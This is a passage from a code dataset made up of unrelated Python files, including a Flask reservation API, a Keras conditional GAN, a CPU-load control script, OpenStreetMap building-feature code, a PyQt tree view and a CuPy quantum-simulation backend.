help='This field cannot be blank', required=True)\nparser.add_argument(\n 'players', action='append', help='This field cannot be blank', required=True)\nparser.add_argument(\n 'totalScores', action='append', help='This field cannot be blank', required=True)\nclass reserveCourse(Resource):\n @jwt_required\n def post(self):\n data = parser.parse_args()\n user_email = get_jwt_identity()\n user = UserModel.find_by_email(user_email)\n players = data['players']\n \n try:\n for player in players:\n convert_player = literal_eval(player)\n new_player = None\n print(convert_player['email'])\n new_player = PlayersModel.find_by_email(\n convert_player['email'], user.id)\n if new_player== None: \n new_player = PlayersModel(\n user_id=user.id,\n email=convert_player['email'],\n name=convert_player['name'],\n aveScore=convert_player['aveScore']\n )\n new_player.save_to_db()\n new_games = GameModel(\n course = data['course'],\n date = data['date'],\n user_id = user.id,\n player_id = new_player.id,\n total_score=int(data['totalScores'][0])\n )\n new_games.save_to_db()\n new_games.game.append(user)\n db.session.commit()\n \n return {\n 'message': 'Course {} was scheduled for {}'.format(data['course'], data['date'])\n }, 200\n\n except Exception as e:\n print(e)\n return {'message': 'Something went wrong'}, 500\n\n","sub_path":"resources/reserve.py","file_name":"reserve.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"238592006","text":"from django.urls import resolve\nfrom django.conf import settings\n\nfrom cmpirque.pages.models import Page\n\n\ndef site_context(request):\n return {\"site_name\": settings.SITE_NAME}\n\n\ndef pages_context(request):\n resolve_from_path = resolve(request.path)\n selected_map = {\"home\": True if resolve_from_path.url_name == \"home\" else False}\n if (\n resolve_from_path.view_name == \"pages:detail\"\n and \"slug\" in resolve_from_path.kwargs\n ):\n selected_map[resolve_from_path.kwargs[\"slug\"]] = True\n return {\n \"menu_pages\": [\n {\n \"title\": page.title,\n \"slug\": page.slug,\n \"url\": page.get_absolute_url(),\n \"selected\": selected_map.get(page.slug, False),\n }\n for page in Page.objects.all()\n ]\n }\n","sub_path":"cmpirque/pages/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"334570349","text":"# -*- coding: UTF-8 -*-\nimport openpyxl\nfrom openpyxl.formatting.rule import IconSet, FormatObject\n\nsecond = FormatObject(type='percent', val=33)\n\nxlsx = openpyxl.Workbook()\nsheet_info = xlsx.create_sheet('文章分析')\nsheet_info.cell(row= 2, column= 2).value = 5/8\nsheet_info.cell(row= 2, column= 2).number_format = '0.00%'\n\n\nxlsx.save(\"/Users/xupeng/Desktop/xupengk.xlsx\")\n\n","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"506372051","text":"instr = \"3113322113\"\n\nfor i in range(50):\n res = ''\n last = instr[0]\n count = 1\n for i in range(1,len(instr)):\n if instr[i] == last:\n count += 1\n else:\n res += str(count) + last\n last = instr[i]\n count = 1\n res += str(count) + last\n instr = res\n if len(instr) < 100:\n print(instr)\n\nprint(len(instr))\n","sub_path":"aoc10-1.py","file_name":"aoc10-1.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"325438719","text":"#!/usr/bin/env python\n# encoding: utf-8\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n\n######################################################################\n#\n# See COPYING file distributed along with the psignifit package for\n# the copyright and license terms\n#\n######################################################################\n\n\"\"\" Windows specific setup.py for Psignifit 3.x\n\nInstead of linking to a shared library like in `setup.py`, all of Psi++ is\ncompiled into the extension.\n\n\"\"\"\n\n# other imports, metadata and extension definition\nfrom setup import *\n\n# Psi++ source files\npsipp_sources = [\n \"src/bootstrap.cc\",\n \"src/core.cc\",\n \"src/data.cc\",\n \"src/mclist.cc\",\n \"src/mcmc.cc\",\n \"src/optimizer.cc\",\n \"src/psychometric.cc\",\n \"src/rng.cc\",\n \"src/sigmoid.cc\",\n \"src/special.cc\",\n \"src/linalg.cc\",\n \"src/getstart.cc\",\n \"src/prior.cc\",\n \"src/integrate.cc\"]\n\n# swignifit interface, override the definition in `setup.py`\nswignifit = Extension('swignifit._swignifit_raw',\n sources = psipp_sources + swignifit_sources,\n include_dirs=[\"src\"])\n\nif __name__ == \"__main__\":\n main(ext_modules=[swignifit])\n","sub_path":"windows_setup.py","file_name":"windows_setup.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"247891117","text":"from keras.models import Sequential, Model\nfrom keras.layers import Dense, Conv2D, Conv2DTranspose, Activation, Reshape\nfrom keras.layers import BatchNormalization, Dropout, Input, UpSampling2D\nfrom keras.layers import LeakyReLU, Flatten, Embedding, multiply\nfrom keras.datasets import mnist\nfrom keras.optimizers import Adam\nimport keras\nimport numpy as np\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport imageio\nimport os\n\n\n\nclass CGAN():\n def __init__(self):\n # Size of the grayscale images in the dataset\n self.img_rows = 28\n self.img_cols = 28\n self.num_channels = 1\n self.num_classes = 10\n\n # Size of the noise vector used as input to the generator\n self.latent_dim = 100\n self.img_shape = (self.img_rows, self.img_cols, self.num_channels)\n\n optim = Adam(0.0002, 0.5)\n\n self.discriminator = self.build_discriminator()\n self.discriminator.compile(loss='binary_crossentropy', optimizer=optim,\n metrics=['accuracy'])\n self.generator = self.build_generator()\n\n z = Input(shape=(self.latent_dim,))\n label = Input(shape=(1,))\n img = self.generator([z, label])\n\n self.discriminator.trainable = False\n\n valid = self.discriminator([img, label])\n\n\n # self.combined = Sequential()\n # self.combined.add(self.generator)\n # self.discriminator.trainable = False\n self.combined = Model([z, label], valid)\n self.combined.compile(loss='binary_crossentropy', optimizer=optim)\n\n\n\n\n\n # Defines the Generator network model\n def build_generator(self):\n model = Sequential()\n\n # model.add(Dense(1024, input_dim=self.latent_dim))\n # model.add(Reshape((4, 4, -1)))\n # model.add(Conv2DTranspose(128, 8, data_format=\"channels_last\"))\n # model.add(BatchNormalization())\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Dropout(rate=0.3))\n # model.add(Conv2DTranspose(128, 8, data_format=\"channels_last\"))\n # model.add(BatchNormalization())\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Dropout(rate=0.3))\n # model.add(Conv2DTranspose(128, 8, data_format=\"channels_last\"))\n # model.add(BatchNormalization())\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Dropout(rate=0.3))\n # # model.add(Conv2DTranspose(128, 7, data_format=\"channels_last\"))\n # # model.add(BatchNormalization())\n # # model.add(LeakyReLU(alpha=0.2))\n # # model.add(Dropout(rate=0.3))\n # # model.add(Conv2DTranspose(128, 4, data_format=\"channels_last\"))\n # # model.add(BatchNormalization())\n # # model.add(LeakyReLU(alpha=0.2))\n # # model.add(Dropout(rate=0.3))\n # # model.add(Conv2DTranspose(128, 4, data_format=\"channels_last\"))\n # # model.add(BatchNormalization())\n # # model.add(LeakyReLU(alpha=0.2))\n # # model.add(Dropout(rate=0.3))\n # # model.add(Conv2DTranspose(128, 4, data_format=\"channels_last\"))\n # # model.add(BatchNormalization())\n # # model.add(LeakyReLU(alpha=0.2))\n # # model.add(Dropout(rate=0.3))\n # # model.add(Conv2DTranspose(64, 5, data_format=\"channels_last\", padding='same'))\n # # model.add(BatchNormalization())\n # # model.add(LeakyReLU(alpha=0.2))\n # # model.add(Conv2DTranspose(64, 5, data_format=\"channels_last\", padding='same'))\n # # model.add(BatchNormalization())\n # # model.add(LeakyReLU(alpha=0.2))\n # # model.add(Conv2DTranspose(64, 5, data_format=\"channels_last\", padding='same'))\n # # model.add(BatchNormalization())\n # # model.add(LeakyReLU(alpha=0.2))\n # # model.add(Conv2DTranspose(64, 5, data_format=\"channels_last\", padding='same'))\n # # model.add(BatchNormalization())\n # # model.add(LeakyReLU(alpha=0.2))\n # # model.add(Conv2DTranspose(64, 5, data_format=\"channels_last\", padding='same'))\n # # model.add(BatchNormalization())\n # # model.add(LeakyReLU(alpha=0.2))\n # model.add(Conv2DTranspose(self.num_channels, 4, data_format=\"channels_last\"))\n # model.add(BatchNormalization())\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Activation('tanh'))\n\n model.add(Dense(64 * self.img_rows * self.img_cols, activation=\"relu\", input_dim=self.latent_dim))\n model.add(Reshape((self.img_rows, self.img_cols, 64)))\n #model.add(UpSampling2D())\n model.add(Conv2DTranspose(64, kernel_size=3, padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n #model.add(Activation(\"relu\"))\n model.add(LeakyReLU())\n model.add(Dropout(rate=0.3))\n #model.add(UpSampling2D())\n model.add(Conv2DTranspose(32, kernel_size=3, padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n #model.add(Activation(\"relu\"))\n model.add(LeakyReLU())\n model.add(Dropout(rate=0.3))\n model.add(Conv2DTranspose(self.num_channels, kernel_size=3, padding=\"same\"))\n model.add(Activation(\"tanh\"))\n\n print(\"Starting Generator layers\")\n for layer in model.layers:\n print(layer.input_shape, layer.output_shape)\n print(\"Ending Generator layers\")\n\n model.summary()\n\n noise = Input(shape=(self.latent_dim,))\n label = Input(shape=(1,), dtype='int32')\n label_embedding = Flatten()(Embedding(self.num_classes, self.latent_dim)(label))\n\n model_input = multiply([noise, label_embedding])\n img = model(model_input)\n\n return Model([noise, label], img)\n\n # Defines the Discriminator network model\n def build_discriminator(self):\n model = Sequential()\n\n\n model.add(Dense(64 * self.img_rows * self.img_cols, input_dim=np.prod(self.img_shape)))\n model.add(Reshape((self.img_rows, self.img_cols, 64)))\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Dense(512))\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Dropout(0.4))\n # model.add(Dense(512))\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Dropout(0.4))\n # model.add(Dense(1, activation='sigmoid'))\n\n\n # model.add(Conv2D(128, 4,input_shape=self.img_shape, data_format=\"channels_last\", padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dropout(rate=0.3))\n model.add(Conv2D(64, 7, data_format=\"channels_last\", padding='same'))\n model.add(BatchNormalization())\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dropout(rate=0.3))\n model.add(Conv2D(64, 7, data_format=\"channels_last\", padding='same'))\n model.add(BatchNormalization())\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dropout(rate=0.3))\n # model.add(Conv2D(128, 7, data_format=\"channels_last\"))\n # model.add(BatchNormalization())\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Dropout(rate=0.3))\n # model.add(Conv2D(64, 4, data_format=\"channels_last\", padding='same'))\n # model.add(BatchNormalization())\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Conv2D(64, 4, data_format=\"channels_last\", padding='same'))\n # model.add(BatchNormalization())\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Conv2D(64, 4, data_format=\"channels_last\", padding='same'))\n # model.add(BatchNormalization())\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Conv2D(64, 4, data_format=\"channels_last\", padding='same'))\n # model.add(BatchNormalization())\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Conv2D(64, 4, data_format=\"channels_last\", padding='same'))\n model.add(Reshape((-1,)))\n model.add(Dense(1, activation=\"sigmoid\"))\n print(\"Starting Discriminator layers\")\n for layer in model.layers:\n print(layer.input_shape,layer.output_shape)\n print(\"Ending Discriminator layers\")\n\n model.summary()\n\n img = Input(shape=self.img_shape)\n label = Input(shape=(1,), dtype='int32')\n\n label_embedding = Flatten()(Embedding(self.num_classes, np.prod(self.img_shape))(label))\n flat_img = Flatten()(img)\n\n model_input = multiply([flat_img, label_embedding])\n\n validity = model(model_input)\n\n return Model([img, label], validity)\n\n return model\n\n # Trains the discriminator and generator networks of the GAN\n def train(self, epochs, batch_size=128, gen_interval=50):\n # The test sets and classifier labels don't matter\n (X_train, Y_train), (_, _) = mnist.load_data()\n\n # Rescaling images to [-1, 1] because of tanh\n X_train = X_train / 127.5 - 1.0\n\n # Adding a 4th dimension since keras expects 4D tensors\n X_train = np.expand_dims(X_train, axis=3)\n\n prev_disc_acc = 0\n prev_gen_loss = 100\n count = 0\n\n for epoch in range(epochs):\n idx = np.random.randint(0, X_train.shape[0], batch_size)\n imgs, labels = X_train[idx], Y_train[idx]\n\n # Generate a noise vector as input to the generator network\n noise = np.random.normal(0, 1, (batch_size, self.latent_dim))\n\n fake_imgs = self.generator.predict([noise, labels])\n\n # Generate vectors of the correct labels to train the discriminator\n real = np.ones((batch_size, 1))\n fake = np.zeros((batch_size, 1))\n\n #print(self.discriminator.metrics_names)\n #print(self.combined.metrics_names)\n\n if prev_disc_acc < 0.6 or count > 50:\n real_loss = self.discriminator.train_on_batch([imgs, labels], real)\n fake_loss = self.discriminator.train_on_batch([fake_imgs, labels], fake)\n disc_loss = 0.5 * np.add(real_loss, fake_loss)\n print(disc_loss)\n prev_disc_acc = disc_loss[1]\n count = 0\n else:\n real_loss = self.discriminator.evaluate([imgs, labels], real)\n fake_loss = self.discriminator.evaluate([fake_imgs, labels], fake)\n disc_loss = 0.5 * np.add(real_loss, fake_loss)\n prev_disc_acc = disc_loss[1]\n\n # real_loss = self.discriminator.train_on_batch(imgs, real)\n # fake_loss = self.discriminator.train_on_batch(fake_imgs, fake)\n # disc_loss = 0.5 * np.add(real_loss, fake_loss)\n #print(disc_loss)\n\n # Generate a new noise vector to train the generator on the combined model\n noise = np.random.normal(0, 1, (batch_size, self.latent_dim))\n gen_labels = np.random.randint(0, 10, batch_size).reshape(-1, 1)\n gen_loss = self.combined.train_on_batch([noise, gen_labels], real)\n #print(gen_loss)\n\n print(\"%d [Disc loss: %f, acc.: %.2f%%] [Gen loss: %f]\" % (epoch, disc_loss[0], 100*disc_loss[1], gen_loss))\n\n if epoch % gen_interval == 0:\n self.gen_images(epoch)\n\n # Returns an image that is generated by the generator network\n def gen_images(self, epoch):\n r, c = 2, 5\n noise = np.random.normal(0, 1, (r * c, self.latent_dim))\n gen_labels = np.arange(0, 10).reshape(-1, 1)\n gen_imgs = self.generator.predict([noise, gen_labels])\n\n # Rescale images 0 - 1\n gen_imgs = 0.5 * gen_imgs + 0.5\n\n fig, axs = plt.subplots(r, c)\n cnt = 0\n for i in range(r):\n for j in range(c):\n axs[i,j].imshow(gen_imgs[cnt, :,:,0], cmap='gray')\n axs[i,j].set_title(\"Digit: %d\" % gen_labels[cnt])\n axs[i,j].axis('off')\n cnt += 1\n fig.savefig(\"images8/%d.png\" % epoch)\n plt.close()\n\n # Converts a directory full of images into a gif\n def save_video(self):\n\n path = 'images8/'\n\n image_folder = os.fsencode(path)\n\n filenames = []\n\n for file in os.listdir(image_folder):\n filename = os.fsdecode(file)\n if filename.endswith( ('.jpeg', '.png', '.gif') ):\n filenames.append(path+filename)\n\n filenames.sort() # this iteration technique has no built in order, so sort the frames\n\n images = list(map(lambda filename: imageio.imread(filename), filenames))\n\n imageio.mimsave(os.path.join('movie8.gif'), images, duration = 0.04)\n\n\ncgan = CGAN()\ncgan.train(10000)\ncgan.save_video()\n","sub_path":"cgan_example.py","file_name":"cgan_example.py","file_ext":"py","file_size_in_byte":12488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"546985196","text":"import yfinance as yf\r\n\r\n#atv = input(str(\"código do ativo:\"))\r\n#atv = atv + \".SA\"\r\nativo = yf.download(\"6L=F\", progress=False)['Adj Close']\r\ncash3 = yf.download(\"CASH3.SA\", start=\"2020-11-09\", end=\"2021-12-09\",progress=False)['Close']\r\narq = open(\"teste.txt\",'w')\r\narq.write(str(cash3))\r\narq.close()\r\nprint(cash3)","sub_path":"YahooFinance/cash3.py","file_name":"cash3.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"342596184","text":"# Author : Mao zhixiang\n# Email : 405641872@qq.com\n# Date : 2016.05.29\nimport subprocess as sp\nimport time\nimport sys\n\nnum_of_cpus = 0\nset_pids = []\navailable_cpus = 0\nmask_arr = []\nlast_check_cpu_time = []\ninfo_names = ['processor','vendor_id','cpu family','model name','cpu MHz','cache size','cache_alignment']\n\ndef set_cpu_rate(cpuid,rate):\n global set_pids\n global mask_arr\n if mask_arr[cpuid]==0:\n return \n if set_pids[cpuid]!=0: \n reset_cpu_rate(cpuid)\n set_ps = sp.Popen(['./set_cpu_rate',str(cpuid),str(rate)])\n set_pids[cpuid] = set_ps.pid\n print('the pid of set process is',set_ps.pid)\n tsk_ps = sp.call(['taskset','-cp',str(cpuid),str(set_ps.pid)])\n \ndef reset_cpu_rate(cpuid):\n global set_pids\n global mask_arr\n if mask_arr[cpuid]==0:\n return \n if set_pids[cpuid]!=0: \n sp.call(['kill',str(set_pids[cpuid])])\n set_pids[cpuid] = 0\n print('reset cpu rate of cpu%d.'%(cpuid))\n return\n\ndef get_cpu_rate():\n global num_of_cpus\n global last_check_cpu_time\n global mask_arr\n rates = []\n for i in range(num_of_cpus):\n if mask_arr[i]==0:\n continue \n tmp = check_cpu_time(i)\n totle = tmp['totle']-last_check_cpu_time[i]['totle']\n idle = tmp['idle']-last_check_cpu_time[i]['idle']\n last_check_cpu_time[i] = tmp\n if totle!=0:\n #rates.append(int((totle-idle)/totle*100)) --doesn't work in python2\n rates.append(int(float(totle-idle)/totle*100))\n else:\n rates.append(0)\n return rates\n\ndef get_cpu_info():\n global available_cpus\n cpuid = 0\n infos = []\n with open('/proc/cpuinfo') as ifl:\n info = dict()\n for line in ifl:\n if line == '\\n':\n if mask_arr[cpuid]==1: \n infos.append(info)\n cpuid = cpuid+1\n info = dict()\n else: \n tmp = line[0:len(line)-1].split(':')\n for info_name in info_names:\n if tmp[0].startswith(info_name):\n info[info_name] = tmp[1].strip()\n return {'infos':infos}\n\ndef get_cpu_num():\n count = 0\n with open('/proc/cpuinfo') as ifl:\n info = dict()\n for line in ifl:\n if line == '\\n':\n count = count+1\n info = dict()\n return count\n \ndef check_cpu_time(cpuid):\n cpuid = cpuid + 2\n with open('/proc/stat') as sfl:\n while cpuid>0:\n cpuid = cpuid -1 \n line = sfl.readline()\n #print(line)\n tms = line[0:len(line)-1].split(' ')\n res = dict()\n res['idle'] = int(tms[4])\n res['totle'] = 0\n for i in range(1,len(tms)):\n res['totle'] = res['totle']+int(tms[i])\n return res\n\ndef set_mask():\n global mask_arr\n global num_of_cpus\n test_ps = sp.Popen([\"sleep\",\"3\"])\n p = sp.Popen([\"taskset\",\"-p\",str(test_ps.pid)],stdout=sp.PIPE)\n out_str = str(p.stdout.read()).split(':')[1].strip()\n if sys.version_info.major==3:\n mask = int(out_str[0:len(out_str)-3],16)\n else:\n mask = int(out_str,16)\n mask_arr = []\n while mask != 0:\n mask_arr.append(mask%2)\n mask = int(mask/2)\n while len(mask_arr) 0: #%count and percentage of civilan buildings + area\r\n area_residental=d['house']+d['residential']+d['terrace']+d['detached']+d['bungalow']+d['dormitory']\r\n v.append(area_residental)\r\n v.append(round(area_residental/(gdf_proj['building'].dropna().value_counts().sum()),4))\r\n area_residental=0\r\n for i in my_list:\r\n area_residental+=gdf_proj[gdf_proj['building']==i].area.sum()\r\n v.append(area_residental)\r\n else:\r\n v.append(np.nan)\r\n v.append(np.nan)\r\n v.append(np.nan)\r\n my_list=[i for i in religious if i in list(d.keys())]\r\n if len(my_list) > 0: #% count religious buildings + area\r\n area_residental=d['cathedral']+d['chapel']+d['church']+d['mosque']+d['religious']+d['shrine']+d['synagogue']+d['temple']\r\n v.append(area_residental)\r\n area_residental=0\r\n for i in my_list:\r\n area_residental+=gdf_proj[gdf_proj['building']==i].area.sum()\r\n v.append(area_residental)\r\n else:\r\n v.append(np.nan)\r\n v.append(np.nan)\r\n if 'commercial' in d:\r\n v.append(d['commercial']) #Total commercial buildings count\r\n v.append(gdf_proj[gdf_proj['building']=='commercial'].area.sum()) #commerical building area\r\n else:\r\n v.append(np.nan)\r\n v.append(np.nan)\r\n if 'retail' in d:\r\n v.append(d['retail']) #Total retail buildings count\r\n v.append(gdf_proj[gdf_proj['building']=='retail'].area.sum()) #retail building area\r\n else:\r\n v.append(np.nan)\r\n v.append(np.nan)\r\n if 'school' in d:\r\n v.append(d['school']) #Total school buildings count\r\n v.append(gdf_proj[gdf_proj['building']=='school'].area.sum()) #school building area\r\n else:\r\n v.append(np.nan)\r\n v.append(np.nan)\r\n if 'university' in d:\r\n v.append(d['university']) #Total university count\r\n v.append(gdf_proj[gdf_proj['building']=='university'].area.sum()) # university area\r\n else:\r\n v.append(np.nan)\r\n v.append(np.nan)\r\n if 'yes' in d:\r\n v.append(d['yes']) #Total unclassified count\r\n v.append(gdf_proj[gdf_proj['building']=='yes'].area.sum()) # unclassified area\r\n else:\r\n v.append(np.nan)\r\n v.append(np.nan)\r\n else:\r\n v.append([np.nan]*24)####################13\r\n v= [item for sublist in v for item in sublist]\r\n \r\n if 'amenity' in cols: #order changed ,19+1\r\n d=defaultdict(int,dict(gdf_proj['amenity'].value_counts()))\r\n v.append(len(gdf_proj['amenity'].dropna().unique())) #Tyes of amenities\r\n v = amenity(d,v)\r\n else:\r\n temp=[[np.nan]]*20\r\n v= v + [item for sublist in temp for item in sublist]\r\n\r\n if 'tourism' in cols:\r\n d = defaultdict(int,gdf_proj.tourism.value_counts())\r\n v.append(len(list(gdf_proj['tourism'].dropna().unique()))) # Types of Tourism\r\n v.append(gdf_proj.tourism.value_counts().sum()) # Total tourism related stuff\r\n v.append(d['attraction']) # tourist attractions\r\n else:\r\n v.append(np.nan)\r\n v.append(np.nan)\r\n v.append(np.nan)\r\n\r\n if 'leisure' in cols:\r\n v.append(gdf_proj.leisure.value_counts().sum()) # Total Leisure\r\n else:\r\n v.append(np.nan)\r\n\r\n return v \r\n","sub_path":"code/building_features.py","file_name":"building_features.py","file_ext":"py","file_size_in_byte":5646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"362169320","text":"from PyQt4 import QtGui, QtCore\n\n\nclass Widget(QtGui.QWidget):\n def __init__(self, parent=None):\n QtGui.QWidget.__init__(self, parent)\n self.filterLe = QtGui.QLineEdit(self)\n self.mytreeview = QtGui.QTreeView(self)\n self.setLayout(QtGui.QVBoxLayout())\n self.layout().addWidget(self.filterLe)\n self.layout().addWidget(self.mytreeview)\n self.model = QtGui.QStandardItemModel(self.mytreeview)\n\n self.proxyModel = QtGui.QSortFilterProxyModel(self.mytreeview)\n self.proxyModel.setSourceModel(self.model)\n self.mytreeview.setSortingEnabled(True)\n\n # set model\n self.mytreeview.setModel(self.proxyModel)\n self.mytreeview.clicked.connect(self.update_model)\n self.filterLe.textChanged.connect(self.onTextChanged)\n self.initialise_model()\n\n @QtCore.pyqtSlot(str)\n def onTextChanged(self, text):\n self.proxyModel.setFilterRegExp(text)\n\n def initialise_model(self):\n for text in [\"parent1\", \"parent2\", \"parent3\"]:\n item = QtGui.QStandardItem(text)\n self.model.appendRow(item)\n\n def update_model(self, index):\n ix = self.proxyModel.mapToSource(index)\n parent = self.model.itemFromIndex(ix)\n for text in [\"children1\", \"children2\", \"children3\"]:\n children = QtGui.QStandardItem(\"{}_{}\".format(parent.text(), text))\n parent.appendRow(children)\n self.mytreeview.expand(index)\n\n\nif __name__ == '__main__':\n import sys\n app = QtGui.QApplication(sys.argv)\n w = Widget()\n w.show()\n sys.exit(app.exec_())","sub_path":"temp/46868452.py","file_name":"46868452.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"122858340","text":"import numpy as np\nfrom qibo.backends.numpy import NumpyBackend\nfrom qibo.config import log, raise_error\n\nfrom qibojit.backends.cpu import NumbaBackend\nfrom qibojit.backends.matrices import CupyMatrices, CuQuantumMatrices, CustomMatrices\n\n\nclass CupyBackend(NumbaBackend): # pragma: no cover\n # CI does not have GPUs\n\n DEFAULT_BLOCK_SIZE = 1024\n MAX_NUM_TARGETS = 7\n\n def __init__(self):\n NumpyBackend.__init__(self)\n\n import cupy as cp # pylint: disable=import-error\n import cupy_backends # pylint: disable=import-error\n\n self.name = \"qibojit\"\n self.platform = \"cupy\"\n self.versions[\"cupy\"] = cp.__version__\n\n self.supports_multigpu = True\n self.numeric_types = (\n int,\n float,\n complex,\n cp.int32,\n cp.int64,\n cp.float32,\n cp.float64,\n cp.complex64,\n cp.complex128,\n )\n self.tensor_types = (np.ndarray, cp.ndarray)\n from scipy import sparse\n\n self.npsparse = sparse\n self.sparse = cp.sparse\n self.device = \"/GPU:0\"\n self.kernel_type = \"double\"\n self.matrices = CupyMatrices(self.dtype)\n self.custom_matrices = CustomMatrices(self.dtype)\n try:\n if not cp.cuda.runtime.getDeviceCount(): # pragma: no cover\n raise RuntimeError(\"Cannot use cupy backend if GPU is not available.\")\n except cp.cuda.runtime.CUDARuntimeError:\n raise ImportError(\"Could not detect cupy compatible devices.\")\n\n self.cp = cp\n self.is_hip = cupy_backends.cuda.api.runtime.is_hip\n self.KERNELS = (\n \"apply_gate\",\n \"apply_x\",\n \"apply_y\",\n \"apply_z\",\n \"apply_z_pow\",\n \"apply_two_qubit_gate\",\n \"apply_fsim\",\n \"apply_swap\",\n )\n\n # load core kernels\n self.gates = {}\n from qibojit.custom_operators import raw_kernels\n\n def kernel_loader(name, ktype):\n code = getattr(raw_kernels, name)\n code = code.replace(\"T\", f\"thrust::complex<{ktype}>\")\n gate = cp.RawKernel(code, name, (\"--std=c++11\",))\n self.gates[f\"{name}_{ktype}\"] = gate\n\n for ktype in (\"float\", \"double\"):\n for name in self.KERNELS:\n kernel_loader(f\"{name}_kernel\", ktype)\n kernel_loader(f\"multicontrol_{name}_kernel\", ktype)\n kernel_loader(\"collapse_state_kernel\", ktype)\n kernel_loader(\"initial_state_kernel\", ktype)\n\n # load multiqubit kernels\n name = \"apply_multi_qubit_gate_kernel\"\n for ntargets in range(3, self.MAX_NUM_TARGETS + 1):\n for ktype in (\"float\", \"double\"):\n code = getattr(raw_kernels, name)\n code = code.replace(\"T\", f\"thrust::complex<{ktype}>\")\n code = code.replace(\"nsubstates\", str(2**ntargets))\n code = code.replace(\"MAX_BLOCK_SIZE\", str(self.DEFAULT_BLOCK_SIZE))\n gate = cp.RawKernel(code, name, (\"--std=c++11\",))\n self.gates[f\"{name}_{ktype}_{ntargets}\"] = gate\n\n # load numba op for measuring frequencies\n from qibojit.custom_operators.ops import measure_frequencies\n\n self.measure_frequencies_op = measure_frequencies\n\n # number of available GPUs (for multigpu)\n self.ngpus = cp.cuda.runtime.getDeviceCount()\n\n def set_precision(self, precision):\n super().set_precision(precision)\n if self.dtype == \"complex128\":\n self.kernel_type = \"double\"\n elif self.dtype == \"complex64\":\n self.kernel_type = \"float\"\n\n def set_device(self, device):\n if \"GPU\" not in device:\n raise_error(\n ValueError, f\"Device {device} is not available for {self} backend.\"\n )\n # TODO: Raise error if GPU is not available\n self.device = device\n\n def cast(self, x, dtype=None, copy=False):\n if dtype is None:\n dtype = self.dtype\n if self.sparse.issparse(x):\n if dtype != x.dtype:\n return x.astype(dtype)\n else:\n return x\n elif self.npsparse.issparse(x):\n cls = getattr(self.sparse, x.__class__.__name__)\n return cls(x, dtype=dtype)\n elif isinstance(x, self.cp.ndarray) and copy:\n return self.cp.copy(self.cp.asarray(x, dtype=dtype))\n else:\n return self.cp.asarray(x, dtype=dtype)\n\n def to_numpy(self, x):\n if isinstance(x, self.cp.ndarray):\n return x.get()\n elif self.sparse.issparse(x):\n return x.toarray().get()\n elif self.npsparse.issparse(x):\n return x.toarray()\n return np.array(x, copy=False)\n\n def issparse(self, x):\n return self.sparse.issparse(x) or self.npsparse.issparse(x)\n\n def zero_state(self, nqubits):\n n = 1 << nqubits\n kernel = self.gates.get(f\"initial_state_kernel_{self.kernel_type}\")\n state = self.cp.zeros(n, dtype=self.dtype)\n kernel((1,), (1,), [state])\n self.cp.cuda.stream.get_current_stream().synchronize()\n return state\n\n def zero_density_matrix(self, nqubits):\n n = 1 << nqubits\n kernel = self.gates.get(f\"initial_state_kernel_{self.kernel_type}\")\n state = self.cp.zeros(n * n, dtype=self.dtype)\n kernel((1,), (1,), [state])\n self.cp.cuda.stream.get_current_stream().synchronize()\n return state.reshape((n, n))\n\n def identity_density_matrix(self, nqubits, normalize: bool = True):\n n = 1 << nqubits\n state = self.cp.eye(n, dtype=self.dtype)\n self.cp.cuda.stream.get_current_stream().synchronize()\n if normalize:\n state /= 2**nqubits\n return state.reshape((n, n))\n\n def plus_state(self, nqubits):\n state = self.cp.ones(2**nqubits, dtype=self.dtype)\n state /= self.cp.sqrt(2**nqubits)\n return state\n\n def plus_density_matrix(self, nqubits):\n state = self.cp.ones(2 * (2**nqubits,), dtype=self.dtype)\n state /= 2**nqubits\n return state\n\n def asmatrix_fused(self, gate):\n npmatrix = super().asmatrix_fused(gate)\n return self.cast(npmatrix, dtype=self.dtype)\n\n # def control_matrix(self, gate): Inherited from ``NumpyBackend``\n\n def calculate_blocks(self, nstates, block_size=DEFAULT_BLOCK_SIZE):\n \"\"\"Compute the number of blocks and of threads per block.\n\n The total number of threads is always equal to ``nstates``, give that\n the kernels are designed to execute only one out of ``nstates`` updates.\n Therefore, the number of threads per block (``block_size``) changes also\n the total number of blocks. By default, it is set to ``self.DEFAULT_BLOCK_SIZE``.\n \"\"\"\n # Compute the number of blocks so that at least ``nstates`` threads are launched\n nblocks = (nstates + block_size - 1) // 